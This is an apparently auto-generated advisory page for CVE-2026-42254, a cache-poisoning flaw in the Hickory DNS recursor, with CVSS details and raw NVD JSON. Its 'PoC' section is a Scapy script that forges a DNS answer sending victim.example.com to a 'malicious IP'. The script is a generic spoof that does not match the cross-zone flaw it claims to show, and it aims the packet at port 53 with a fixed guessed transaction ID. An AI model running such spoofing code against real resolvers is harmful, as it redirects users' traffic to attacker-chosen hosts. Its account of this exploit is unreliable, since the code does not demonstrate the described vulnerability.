Security Vulnerability Report
中文
CVE-2026-42254 CVSS 4.0 MEDIUM

CVE-2026-42254

Published: 2026-04-26 03:15:59
Last Modified: 2026-04-27 18:57:20
Source: [email protected]

Description

Hickory DNS hickory-recursor 0.1 through 0.25.2 allows cross-zone poisoning because cached data is not directly associated with a query that triggered a response.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

hickory-recursor 0.1
hickory-recursor 0.25.2
hickory-recursor 0.1 through 0.25.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-42254 (Hickory DNS Cross-Zone Poisoning) Note: This is a conceptual demonstration. Scapy is required. """ from scapy.all import IP, UDP, DNS, DNSRR, DNSQR, send def send_poison_response(target_ip, src_port, transaction_id): """ Sends a crafted DNS response to poison the cache. The attack exploits the lack of association between the query and cached data. """ # Construct a malicious DNS response indicating a cross-zone record # Example: Poisoning 'example.com' with a record from 'attacker.com' dns_pkt = IP(dst=target_ip)/UDP(dport=src_port)/DNS( id=transaction_id, qr=1, # Response aa=0, # Not authoritative rcode=0, qd=DNSQR(qname="victim.example.com"), an=DNSRR( rrname="victim.example.com", type="A", ttl=3600, rdata="6.6.6.6" # Malicious IP ) ) print(f"[*] Sending poison packet to {target_ip}...") send(dns_pkt, verbose=0) print("[+] Packet sent.") if __name__ == "__main__": # Configuration target_dns = "192.168.1.100" # Target Hickory Recursor IP dns_port = 53 tid = 12345 # Transaction ID to guess or match send_poison_response(target_dns, dns_port, tid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42254", "sourceIdentifier": "[email protected]", "published": "2026-04-26T03:15:59.080", "lastModified": "2026-04-27T18:57:20.293", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hickory DNS hickory-recursor 0.1 through 0.25.2 allows cross-zone poisoning because cached data is not directly associated with a query that triggered a response."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-706"}]}], "references": [{"url": "https://github.com/hickory-dns/hickory-dns/security/advisories/GHSA-83hf-93m4-rgwq", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.